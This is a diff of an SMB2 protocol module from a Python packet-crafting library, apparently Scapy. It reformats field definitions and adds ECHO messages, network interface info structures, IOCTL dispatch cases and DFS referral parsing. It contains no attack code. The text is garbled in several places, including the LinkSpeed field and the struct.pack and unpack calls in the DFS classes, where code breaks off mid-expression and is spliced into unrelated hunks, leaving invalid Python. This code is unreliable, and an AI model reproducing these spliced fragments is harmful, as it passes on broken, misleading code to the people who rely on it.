+bind_top_down(SMB2_Header, SMB2_Create_Request, Command=0x0005) # sect 2.2.14 @@ -1466,54 +2756,69 @@ def post_build(self, pkt, pay): class SMB2_Create_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 CREATE Response" + Command = 0x0005 OFFSET = 88 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x59), ByteEnumField("OplockLevel", 0, SMB2_OPLOCK_LEVELS), FlagsField("Flags", 0, -8, {0x01: "SMB2_CREATE_FLAG_REPARSEPOINT"}), - LEIntEnumField("CreateAction", 1, { - 0x00000000: "FILE_SUPERSEDED", - 0x00000001: "FILE_OPENED", - 0x00000002: "FILE_CREATED", - 0x00000003: "FILE_OVERWRITEN", - }), + LEIntEnumField( + "CreateAction", + 1, + { + 0x00000000: "FILE_SUPERSEDED", + 0x00000001: "FILE_OPENED", + 0x00000002: "FILE_CREATED", + 0x00000003: "FILE_OVERWRITEN", + }, + ), FileNetworkOpenInformation, PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), XLEIntField("CreateContextsBufferOffset", None), LEIntField("CreateContextsLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ - _NextPacketListField("CreateContexts", [], SMB2_Create_Context, - length_from=lambda pkt: pkt.CreateContextsLen), - ]) + "Buffer", + OFFSET, + [ + _NextPacketListField( + "CreateContexts", + [], + SMB2_Create_Context, + length_from=lambda pkt: pkt.CreateContextsLen, + ), + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "CreateContexts": 80, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "CreateContexts": 80, + }, + ) + + pay + ) -bind_top_down( - SMB2_Header, - SMB2_Create_Response, - Command=0x0005, - Flags=1 -) +bind_top_down(SMB2_Header, SMB2_Create_Response, Command=0x0005, Flags=1) # sect 2.2.15 class SMB2_Close_Request(_SMB2_Payload): name = "SMB2 CLOSE Request" + Command = 0x0006 fields_desc = [ XLEShortField("StructureSize", 0x18), - FlagsField("Flags", 0, -16, - ["SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB"]), + FlagsField("Flags", 0, -16, ["SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB"]), LEIntField("Reserved", 0), - PacketField("FileId", SMB2_FILEID(), SMB2_FILEID) + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), ] @@ -1528,15 +2833,15 @@ class SMB2_Close_Request(_SMB2_Payload): class SMB2_Close_Response(_SMB2_Payload): name = "SMB2 CLOSE Response" + Command = 0x0006 FileAttributes = 0 CreationTime = 0 LastAccessTime = 0 LastWriteTime = 0 ChangeTime = 0 fields_desc = [ - XLEShortField("StructureSize", 0x3c), - FlagsField("Flags", 0, -16, - ["SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB"]), + XLEShortField("StructureSize", 0x3C), + FlagsField("Flags", 0, -16, ["SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB"]), LEIntField("Reserved", 0), ] + FileNetworkOpenInformation.fields_desc[:7] @@ -1553,40 +2858,67 @@ class SMB2_Close_Response(_SMB2_Payload): class SMB2_Read_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 READ Request" + Command = 0x0008 OFFSET = 48 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x31), - ByteField("Padding", 0), - FlagsField("Flags", 0, -8, { - 0x01: "SMB2_READFLAG_READ_UNBUFFERED", - 0x02: "SMB2_READFLAG_REQUEST_COMPRESSED", - }), - LEIntField("Length", 0), + ByteField("Padding", 0x00), + FlagsField( + "Flags", + 0, + -8, + { + 0x01: "SMB2_READFLAG_READ_UNBUFFERED", + 0x02: "SMB2_READFLAG_REQUEST_COMPRESSED", + }, + ), + LEIntField("Length", 1024), LELongField("Offset", 0), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), LEIntField("MinimumCount", 0), - LEIntEnumField("Channel", 0, { - 0x00000000: "SMB2_CHANNEL_NONE", - 0x00000001: "SMB2_CHANNEL_RDMA_V1", - 0x00000002: "SMB2_CHANNEL_RDMA_V1_INVALIDATE", - 0x00000003: "SMB2_CHANNEL_RDMA_TRANSFORM", - }), + LEIntEnumField( + "Channel", + 0, + { + 0x00000000: "SMB2_CHANNEL_NONE", + 0x00000001: "SMB2_CHANNEL_RDMA_V1", + 0x00000002: "SMB2_CHANNEL_RDMA_V1_INVALIDATE", + 0x00000003: "SMB2_CHANNEL_RDMA_TRANSFORM", + }, + ), LEIntField("RemainingBytes", 0), LEShortField("ReadChannelInfoBufferOffset", None), LEShortField("ReadChannelInfoLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ - StrLenField("ReadChannelInfo", b"", - length_from=lambda pkt: pkt.ReadChannelInfoLen) - ]) + "Buffer", + OFFSET, + [ + StrLenField( + "ReadChannelInfo", + b"", + length_from=lambda pkt: pkt.ReadChannelInfoLen, + ) + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "ReadChannelInfo": 44, - }) + pay + if len(pkt) == 0x30: + # 'The first byte of the Buffer field MUST be set to 0.' + pkt += b"\x00" + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "ReadChannelInfo": 44, + }, + ) + + pay + ) bind_top_down( @@ -1600,6 +2932,7 @@ def post_build(self, pkt, pay): class SMB2_Read_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 READ Response" + Command = 0x0008 OFFSET = 16 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ @@ -1607,21 +2940,34 @@ class SMB2_Read_Response(_SMB2_Payload, _NTLMPayloadPacket): LEShortField("DataBufferOffset", None), LEIntField("DataLen", None), LEIntField("DataRemaining", 0), - FlagsField("Flags", 0, -32, { - 0x01: "SMB2_READFLAG_RESPONSE_RDMA_TRANSFORM", - }), + FlagsField( + "Flags", + 0, + -32, + { + 0x01: "SMB2_READFLAG_RESPONSE_RDMA_TRANSFORM", + }, + ), _NTLMPayloadField( - 'Buffer', OFFSET, [ - StrLenField("Data", b"", - length_from=lambda pkt: pkt.DataLen) - ]) + "Buffer", + OFFSET, + [StrLenField("Data", b"", length_from=lambda pkt: pkt.DataLen)], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Data": 2, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Data": 2, + }, + ) + + pay + ) bind_top_down( @@ -1637,6 +2983,7 @@ def post_build(self, pkt, pay): class SMB2_Write_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 WRITE Request" + Command = 0x0009 OFFSET = 48 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ @@ -1645,34 +2992,56 @@ class SMB2_Write_Request(_SMB2_Payload, _NTLMPayloadPacket): LEIntField("DataLen", None), LELongField("Offset", 0), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), - LEIntEnumField("Channel", 0, { - 0x00000000: "SMB2_CHANNEL_NONE", - 0x00000001: "SMB2_CHANNEL_RDMA_V1", - 0x00000002: "SMB2_CHANNEL_RDMA_V1_INVALIDATE", - 0x00000003: "SMB2_CHANNEL_RDMA_TRANSFORM", - }), + LEIntEnumField( + "Channel", + 0, + { + 0x00000000: "SMB2_CHANNEL_NONE", + 0x00000001: "SMB2_CHANNEL_RDMA_V1", + 0x00000002: "SMB2_CHANNEL_RDMA_V1_INVALIDATE", + 0x00000003: "SMB2_CHANNEL_RDMA_TRANSFORM", + }, + ), LEIntField("RemainingBytes", 0), LEShortField("WriteChannelInfoBufferOffset", None), LEShortField("WriteChannelInfoLen", None), - FlagsField("Flags", 0, -32, { - 0x00000001: "SMB2_WRITEFLAG_WRITE_THROUGH", - 0x00000002: "SMB2_WRITEFLAG_WRITE_UNBUFFERED", - }), + FlagsField( + "Flags", + 0, + -32, + { + 0x00000001: "SMB2_WRITEFLAG_WRITE_THROUGH", + 0x00000002: "SMB2_WRITEFLAG_WRITE_UNBUFFERED", + }, + ), _NTLMPayloadField( - 'Buffer', OFFSET, [ - StrLenField("Data", b"", - length_from=lambda pkt: pkt.DataLen), - StrLenField("WriteChannelInfo", b"", - length_from=lambda pkt: pkt.WriteChannelInfoLen) - ]) + "Buffer", + OFFSET, + [ + StrLenField("Data", b"", length_from=lambda pkt: pkt.DataLen), + StrLenField( + "WriteChannelInfo", + b"", + length_from=lambda pkt: pkt.WriteChannelInfoLen, + ), + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Data": 2, - "WriteChannelInfo": 40, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Data": 2, + "WriteChannelInfo": 40, + }, + ) + + pay + ) bind_top_down( @@ -1686,6 +3055,7 @@ def post_build(self, pkt, pay): class SMB2_Write_Response(_SMB2_Payload): name = "SMB2 WRITE Response" + Command = 0x0009 fields_desc = [ XLEShortField("StructureSize", 0x11), LEShortField("Reserved", 0), @@ -1696,11 +3066,43 @@ class SMB2_Write_Response(_SMB2_Payload): ] +bind_top_down(SMB2_Header, SMB2_Write_Response, Command=0x0009, Flags=1) + +# sect 2.2.28 + + +class SMB2_Echo_Request(_SMB2_Payload): + name = "SMB2 ECHO Request" + Command = 0x000D + fields_desc = [ + XLEShortField("StructureSize", 0x4), + LEShortField("Reserved", 0), + ] + + bind_top_down( SMB2_Header, - SMB2_Write_Response, - Command=0x0009, - Flags=1 + SMB2_Echo_Request, + Command=0x000D, +) + +# sect 2.2.29 + + +class SMB2_Echo_Response(_SMB2_Payload): + name = "SMB2 ECHO Response" + Command = 0x000D + fields_desc = [ + XLEShortField("StructureSize", 0x4), + LEShortField("Reserved", 0), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Echo_Response, + Command=0x000D, + Flags=1, # SMB2_FLAGS_SERVER_TO_REDIR ) # sect 2.2.30 @@ -1726,23 +3128,29 @@ class SMB2_Cancel_Request(_SMB2_Payload): class SMB2_IOCTL_Validate_Negotiate_Info_Request(Packet): name = "SMB2 IOCTL Validate Negotiate Info" fields_desc = ( - SMB2_Negotiate_Protocol_Request.fields_desc[4:6] + # Cap/GUID - SMB2_Negotiate_Protocol_Request.fields_desc[1:3][::-1] + # SecMod/DC - [SMB2_Negotiate_Protocol_Request.fields_desc[9]] # Dialects + SMB2_Negotiate_Protocol_Request.fields_desc[4:6] + + SMB2_Negotiate_Protocol_Request.fields_desc[1:3][::-1] # Cap/GUID + + [SMB2_Negotiate_Protocol_Request.fields_desc[9]] # SecMod/DC # Dialects ) # sect 2.2.31 + class _SMB2_IOCTL_Request_PacketLenField(PacketLenField): def m2i(self, pkt, m): if pkt.CtlCode == 0x00140204: # FSCTL_VALIDATE_NEGOTIATE_INFO return SMB2_IOCTL_Validate_Negotiate_Info_Request(m) + elif pkt.CtlCode == 0x00060194: # FSCTL_DFS_GET_REFERRALS + return SMB2_IOCTL_REQ_GET_DFS_Referral(m) + elif pkt.CtlCode == 0x00094264: # FSCTL_OFFLOAD_READ + return SMB2_IOCTL_OFFLOAD_READ_Request(m) return conf.raw_layer(m) class SMB2_IOCTL_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 IOCTL Request" + Command = 0x000B OFFSET = 56 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" deprecated_fields = { @@ -1752,52 +3160,68 @@ class SMB2_IOCTL_Request(_SMB2_Payload, _NTLMPayloadPacket): fields_desc = [ XLEShortField("StructureSize", 0x39), LEShortField("Reserved", 0), - LEIntEnumField("CtlCode", 0, { - 0x00060194: "FSCTL_DFS_GET_REFERRALS", - 0x0011400C: "FSCTL_PIPE_PEEK", - 0x00110018: "FSCTL_PIPE_WAIT", - 0x0011C017: "FSCTL_PIPE_TRANSCEIVE", - 0x001440F2: "FSCTL_SRV_COPYCHUNK", - 0x00144064: "FSCTL_SRV_ENUMERATE_SNAPSHOTS", - 0x00140078: "FSCTL_SRV_REQUEST_RESUME_KEY", - 0x001441bb: "FSCTL_SRV_READ_HASH", - 0x001480F2: "FSCTL_SRV_COPYCHUNK_WRITE", - 0x001401D4: "FSCTL_LMR_REQUEST_RESILIENCY", - 0x001401FC: "FSCTL_QUERY_NETWORK_INTERFACE_INFO", - 0x000900A4: "FSCTL_SET_REPARSE_POINT", - 0x000601B0: "FSCTL_DFS_GET_REFERRALS_EX", - 0x00098208: "FSCTL_FILE_LEVEL_TRIM", - 0x00140204: "FSCTL_VALIDATE_NEGOTIATE_INFO", - }), + LEIntEnumField( + "CtlCode", + 0, + { + 0x00060194: "FSCTL_DFS_GET_REFERRALS", + 0x0011400C: "FSCTL_PIPE_PEEK", + 0x00110018: "FSCTL_PIPE_WAIT", + 0x0011C017: "FSCTL_PIPE_TRANSCEIVE", + 0x001440F2: "FSCTL_SRV_COPYCHUNK", + 0x00144064: "FSCTL_SRV_ENUMERATE_SNAPSHOTS", + 0x00140078: "FSCTL_SRV_REQUEST_RESUME_KEY", + 0x001441BB: "FSCTL_SRV_READ_HASH", + 0x001480F2: "FSCTL_SRV_COPYCHUNK_WRITE", + 0x001401D4: "FSCTL_LMR_REQUEST_RESILIENCY", + 0x001401FC: "FSCTL_QUERY_NETWORK_INTERFACE_INFO", + 0x000900A4: "FSCTL_SET_REPARSE_POINT", + 0x000601B0: "FSCTL_DFS_GET_REFERRALS_EX", + 0x00098208: "FSCTL_FILE_LEVEL_TRIM", + 0x00140204: "FSCTL_VALIDATE_NEGOTIATE_INFO", + 0x00094264: "FSCTL_OFFLOAD_READ", + }, + ), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), LEIntField("InputBufferOffset", None), LEIntField("InputLen", None), # Called InputCount but it's a length LEIntField("MaxInputResponse", 0), LEIntField("OutputBufferOffset", None), LEIntField("OutputLen", None), # Called OutputCount. - LEIntField("MaxOutputResponse", 0), - FlagsField("Flags", 0, -32, { - 0x00000001: "SMB2_0_IOCTL_IS_FSCTL" - }), + LEIntField("MaxOutputResponse", 4280), + FlagsField("Flags", 0, -32, {0x00000001: "SMB2_0_IOCTL_IS_FSCTL"}), LEIntField("Reserved2", 0), _NTLMPayloadField( - 'Buffer', OFFSET, [ + "Buffer", + OFFSET, + [ _SMB2_IOCTL_Request_PacketLenField( - "Input", None, conf.raw_layer, - length_from=lambda pkt: pkt.InputLen), + "Input", None, conf.raw_layer, length_from=lambda pkt: pkt.InputLen + ), _SMB2_IOCTL_Request_PacketLenField( - "Output", None, conf.raw_layer, - length_from=lambda pkt: pkt.OutputLen), + "Output", + None, + conf.raw_layer, + length_from=lambda pkt: pkt.OutputLen, + ), ], ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Input": 24, - "Output": 36, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Input": 24, + "Output": 36, + }, + ) + + pay + ) bind_top_down( @@ -1806,16 +3230,136 @@ def post_build(self, pkt, pay): Command=0x000B, ) +# sect 2.2.32.5 + + +class SOCKADDR_STORAGE(Packet): + fields_desc = [ + LEShortEnumField("Family", 0x0002, {0x0002: "IPv4", 0x0017: "IPv6"}), + ShortField("Port", 0), + # IPv4 + ConditionalField( + IPField("IPv4Adddress", None), + lambda pkt: pkt.Family == 0x0002, + ), + ConditionalField( + StrFixedLenField("Reserved", b"", length=8), + lambda pkt: pkt.Family == 0x0002, + ), + # IPv6 + ConditionalField( + LEIntField("FlowInfo", 0), + lambda pkt: pkt.Family == 0x00017, + ), + ConditionalField( + IP6Field("IPv6Address", None), + lambda pkt: pkt.Family == 0x00017, + ), + ConditionalField( + LEIntField("ScopeId", 0), + lambda pkt: pkt.Family == 0x00017, + ), + ] + + def default_payload_class(self, _): + return conf.padding_layer + + +class NETWORK_INTERFACE_INFO(Packet): + fields_desc = [ + LEIntField("Next", None), # 0 = no next entry + LEIntField("IfIndex", 1), + FlagsField( + "Capability", + 1, + -32, + { + 0x00000001: "RSS_CAPABLE", + 0x00000002: "RDMA_CAPABLE", + }, + ), + LEIntField("Reserved", 0), + ScalingField("LinkSpeed", 10000000000, fmt=" bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Input": 24, - "Output": 32, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Input": 24, + "Output": 32, + }, + ) + + pay + ) bind_top_down( SMB2_Header, SMB2_IOCTL_Response, Command=0x000B, - Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR + Flags=1, # SMB2_FLAGS_SERVER_TO_REDIR ) # sect 2.2.33 @@ -1868,33 +3435,44 @@ def post_build(self, pkt, pay): class SMB2_Query_Directory_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 QUERY DIRECTORY Request" + Command = 0x000E OFFSET = 32 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x21), ByteEnumField("FileInformationClass", 0x1, FileInformationClasses), - FlagsField("Flags", 0, -8, { - 0x01: "SMB2_RESTART_SCANS", - 0x02: "SMB2_RETURN_SINGLE_ENTRY", - 0x04: "SMB2_INDEX_SPECIFIED", - 0x10: "SMB2_REOPEN", - }), + FlagsField( + "Flags", + 0, + -8, + { + 0x01: "SMB2_RESTART_SCANS", + 0x02: "SMB2_RETURN_SINGLE_ENTRY", + 0x04: "SMB2_INDEX_SPECIFIED", + 0x10: "SMB2_REOPEN", + }, + ), LEIntField("FileIndex", 0), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), LEShortField("FileNameBufferOffset", None), LEShortField("FileNameLen", None), - LEIntField("OutputBufferLength", 2048), - _NTLMPayloadField( - 'Buffer', OFFSET, [ - StrFieldUtf16("FileName", b"") - ]) + LEIntField("OutputBufferLength", 65535), + _NTLMPayloadField("Buffer", OFFSET, [StrFieldUtf16("FileName", b"")]), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "FileName": 24, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "FileName": 24, + }, + ) + + pay + ) bind_top_down( @@ -1908,6 +3486,7 @@ def post_build(self, pkt, pay): class SMB2_Query_Directory_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 QUERY DIRECTORY Response" + Command = 0x000E OFFSET = 8 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ @@ -1915,18 +3494,28 @@ class SMB2_Query_Directory_Response(_SMB2_Payload, _NTLMPayloadPacket): LEShortField("OutputBufferOffset", None), LEIntField("OutputLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ + "Buffer", + OFFSET, + [ # TODO - StrFixedLenField("Output", b"", - length_from=lambda pkt: pkt.OutputLen) - ]) + StrFixedLenField("Output", b"", length_from=lambda pkt: pkt.OutputLen) + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Output": 2, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Output": 2, + }, + ) + + pay + ) bind_top_down( @@ -1941,27 +3530,38 @@ def post_build(self, pkt, pay): class SMB2_Change_Notify_Request(_SMB2_Payload): name = "SMB2 CHANGE NOTIFY Request" + Command = 0x000F fields_desc = [ XLEShortField("StructureSize", 0x20), - FlagsField("Flags", 0, -16, { - 0x0001: "SMB2_WATCH_TREE", - }), + FlagsField( + "Flags", + 0, + -16, + { + 0x0001: "SMB2_WATCH_TREE", + }, + ), LEIntField("OutputBufferLength", 2048), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), - FlagsField("CompletionFilter", 0, -32, { - 0x00000001: "FILE_NOTIFY_CHANGE_FILE_NAME", - 0x00000002: "FILE_NOTIFY_CHANGE_DIR_NAME", - 0x00000004: "FILE_NOTIFY_CHANGE_ATTRIBUTES", - 0x00000008: "FILE_NOTIFY_CHANGE_SIZE", - 0x00000010: "FILE_NOTIFY_CHANGE_LAST_WRITE", - 0x00000020: "FILE_NOTIFY_CHANGE_LAST_ACCESS", - 0x00000040: "FILE_NOTIFY_CHANGE_CREATION", - 0x00000080: "FILE_NOTIFY_CHANGE_EA", - 0x00000100: "FILE_NOTIFY_CHANGE_SECURITY", - 0x00000200: "FILE_NOTIFY_CHANGE_STREAM_NAME", - 0x00000400: "FILE_NOTIFY_CHANGE_STREAM_SIZE", - 0x00000800: "FILE_NOTIFY_CHANGE_STREAM_WRITE" - }), + FlagsField( + "CompletionFilter", + 0, + -32, + { + 0x00000001: "FILE_NOTIFY_CHANGE_FILE_NAME", + 0x00000002: "FILE_NOTIFY_CHANGE_DIR_NAME", + 0x00000004: "FILE_NOTIFY_CHANGE_ATTRIBUTES", + 0x00000008: "FILE_NOTIFY_CHANGE_SIZE", + 0x00000010: "FILE_NOTIFY_CHANGE_LAST_WRITE", + 0x00000020: "FILE_NOTIFY_CHANGE_LAST_ACCESS", + 0x00000040: "FILE_NOTIFY_CHANGE_CREATION", + 0x00000080: "FILE_NOTIFY_CHANGE_EA", + 0x00000100: "FILE_NOTIFY_CHANGE_SECURITY", + 0x00000200: "FILE_NOTIFY_CHANGE_STREAM_NAME", + 0x00000400: "FILE_NOTIFY_CHANGE_STREAM_SIZE", + 0x00000800: "FILE_NOTIFY_CHANGE_STREAM_WRITE", + }, + ), LEIntField("Reserved", 0), ] @@ -1977,6 +3577,7 @@ class SMB2_Change_Notify_Request(_SMB2_Payload): class SMB2_Change_Notify_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 CHANGE NOTIFY Response" + Command = 0x000F OFFSET = 8 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ @@ -1984,18 +3585,33 @@ class SMB2_Change_Notify_Response(_SMB2_Payload, _NTLMPayloadPacket): LEShortField("OutputBufferOffset", None), LEIntField("OutputLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ - # TODO - StrFixedLenField("Output", b"", - length_from=lambda pkt: pkt.OutputLen) - ]) + "Buffer", + OFFSET, + [ + _NextPacketListField( + "Output", + [], + FILE_NOTIFY_INFORMATION, + length_from=lambda pkt: pkt.OutputLen, + max_count=1000, + ) + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Output": 2, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Output": 2, + }, + ) + + pay + ) bind_top_down( @@ -2013,10 +3629,13 @@ class FILE_GET_QUOTA_INFORMATION(Packet): IntField("NextEntryOffset", 0), FieldLenField("SidLength", None, length_of="Sid"), StrLenField("Sid", b"", length_from=lambda x: x.SidLength), - StrLenField("pad", b"", - length_from=lambda x: ((x.NextEntryOffset - - x.SidLength) - if x.NextEntryOffset else 0)) + StrLenField( + "pad", + b"", + length_from=lambda x: ( + (x.NextEntryOffset - x.SidLength) if x.NextEntryOffset else 0 + ), + ), ] @@ -2031,63 +3650,101 @@ class SMB2_Query_Quota_Info(Packet): StrLenField("pad", b"", length_from=lambda x: x.StartSidOffset), MultipleTypeField( [ - (PacketListField("SidBuffer", [], FILE_GET_QUOTA_INFORMATION, - length_from=lambda x: x.SidListLength), - lambda x: x.SidListLength), - (StrLenField("SidBuffer", b"", - length_from=lambda x: x.StartSidLength), - lambda x: x.StartSidLength) + ( + PacketListField( + "SidBuffer", + [], + FILE_GET_QUOTA_INFORMATION, + length_from=lambda x: x.SidListLength, + ), + lambda x: x.SidListLength, + ), + ( + StrLenField( + "SidBuffer", b"", length_from=lambda x: x.StartSidLength + ), + lambda x: x.StartSidLength, + ), ], - StrFixedLenField("SidBuffer", b"", length=0) - ) + StrFixedLenField("SidBuffer", b"", length=0), + ), ] class SMB2_Query_Info_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 QUERY INFO Request" + Command = 0x0010 OFFSET = 40 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x29), - ByteEnumField("InfoType", 0, { - 0x01: "SMB2_0_INFO_FILE", - 0x02: "SMB2_0_INFO_FILESYSTEM", - 0x03: "SMB2_0_INFO_SECURITY", - 0x04: "SMB2_0_INFO_QUOTA", - }), + ByteEnumField( + "InfoType", + 0, + { + 0x01: "SMB2_0_INFO_FILE", + 0x02: "SMB2_0_INFO_FILESYSTEM", + 0x03: "SMB2_0_INFO_SECURITY", + 0x04: "SMB2_0_INFO_QUOTA", + }, + ), ByteEnumField("FileInfoClass", 0, FileInformationClasses), LEIntField("OutputBufferLength", 0), XLEIntField("InputBufferOffset", None), # Short + Reserved = Int LEIntField("InputLen", None), - FlagsField("AdditionalInformation", 0, -32, { - 0x00000001: "OWNER_SECURITY_INFORMATION", - 0x00000002: "GROUP_SECURITY_INFORMATION", - 0x00000004: "DACL_SECURITY_INFORMATION", - 0x00000008: "SACL_SECURITY_INFORMATION", - 0x00000010: "LABEL_SECURITY_INFORMATION", - 0x00000020: "ATTRIBUTE_SECURITY_INFORMATION", - 0x00000040: "SCOPE_SECURITY_INFORMATION", - 0x00010000: "BACKUP_SECURITY_INFORMATION", - }), - FlagsField("Flags", 0, -32, { - 0x00000001: "SL_RESTART_SCAN", - 0x00000002: "SL_RETURN_SINGLE_ENTRY", - 0x00000004: "SL_INDEX_SPECIFIED", - }), + FlagsField( + "AdditionalInformation", + 0, + -32, + { + 0x00000001: "OWNER_SECURITY_INFORMATION", + 0x00000002: "GROUP_SECURITY_INFORMATION", + 0x00000004: "DACL_SECURITY_INFORMATION", + 0x00000008: "SACL_SECURITY_INFORMATION", + 0x00000010: "LABEL_SECURITY_INFORMATION", + 0x00000020: "ATTRIBUTE_SECURITY_INFORMATION", + 0x00000040: "SCOPE_SECURITY_INFORMATION", + 0x00010000: "BACKUP_SECURITY_INFORMATION", + }, + ), + FlagsField( + "Flags", + 0, + -32, + { + 0x00000001: "SL_RESTART_SCAN", + 0x00000002: "SL_RETURN_SINGLE_ENTRY", + 0x00000004: "SL_INDEX_SPECIFIED", + }, + ), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), _NTLMPayloadField( - 'Buffer', OFFSET, [ + "Buffer", + OFFSET, + [ PacketListField( - "Input", None, SMB2_Query_Quota_Info, - length_from=lambda pkt: pkt.InputLen), - ]) + "Input", + None, + SMB2_Query_Quota_Info, + length_from=lambda pkt: pkt.InputLen, + ), + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Input": 4, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Input": 4, + }, + ) + + pay + ) bind_top_down( @@ -2097,26 +3754,38 @@ def post_build(self, pkt, pay): ) -class SMB2_Query_Info_Response(_SMB2_Payload): +class SMB2_Query_Info_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 QUERY INFO Response" + Command = 0x0010 OFFSET = 8 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x9), LEShortField("OutputBufferOffset", None), LEIntField("OutputLen", None), _NTLMPayloadField( - 'Buffer', OFFSET, [ + "Buffer", + OFFSET, + [ # TODO - StrFixedLenField("Output", b"", - length_from=lambda pkt: pkt.OutputLen) - ]) + StrFixedLenField("Output", b"", length_from=lambda pkt: pkt.OutputLen) + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _SMB2_post_build(self, pkt, self.OFFSET, { - "Output": 2, - }) + pay + return ( + _SMB2_post_build( + self, + pkt, + self.OFFSET, + { + "Output": 2, + }, + ) + + pay + ) bind_top_down( @@ -2135,13 +3804,248 @@ class SMB2_Compression_Transform_Header(Packet): fields_desc = [ StrFixedLenField("Start", b"\xfcSMB", 4), LEIntField("OriginalCompressedSegmentSize", 0x0), - LEShortEnumField( - "CompressionAlgorithm", 0, - SMB2_COMPRESSION_ALGORITHMS + LEShortEnumField("CompressionAlgorithm", 0, SMB2_COMPRESSION_ALGORITHMS), + ShortEnumField( + "Flags", + 0x0, + { + 0x0000: "SMB2_COMPRESSION_FLAG_NONE", + 0x0001: "SMB2_COMPRESSION_FLAG_CHAINED", + }, ), - ShortEnumField("Flags", 0x0, { - 0x0000: "SMB2_COMPRESSION_FLAG_NONE", - 0x0001: "SMB2_COMPRESSION_FLAG_CHAINED", - }), XLEIntField("Offset_or_Length", 0), ] + + +# [MS-DFSC] sect 2.2 + + +class SMB2_IOCTL_REQ_GET_DFS_Referral(Packet): + fields_desc = [ + LEShortField("MaxReferralLevel", 0), + StrNullFieldUtf16("RequestFileName", ""), + ] + + +class DFS_REFERRAL(Packet): + fields_desc = [ + LEShortField("Version", 1), + FieldLenField( + "Size", None, fmt="= 2: + version = struct.unpack(" bytes + if self.Size is None: + pkt = pkt[:2] + struct.pack(" bytes + # Note: Windows is smart and uses some sort of compression in the sense + # that it re-uses fields that are used several times across ReferralBuffer. + # But we just do the dumb thing because it's 'easier', and do no compression. + offsets = { + # DFS_REFERRAL_ENTRY0 + "DFSPath": 12, + "DFSAlternatePath": 14, + "NetworkAddress": 16, + # DFS_REFERRAL_ENTRY1 + "SpecialName": 12, + "ExpandedName": 16, + } + # dataoffset = pointer in the ReferralBuffer + # entryoffset = pointer in the ReferralEntries + dataoffset = sum(len(x) for x in self.ReferralEntries) + entryoffset = 8 + for 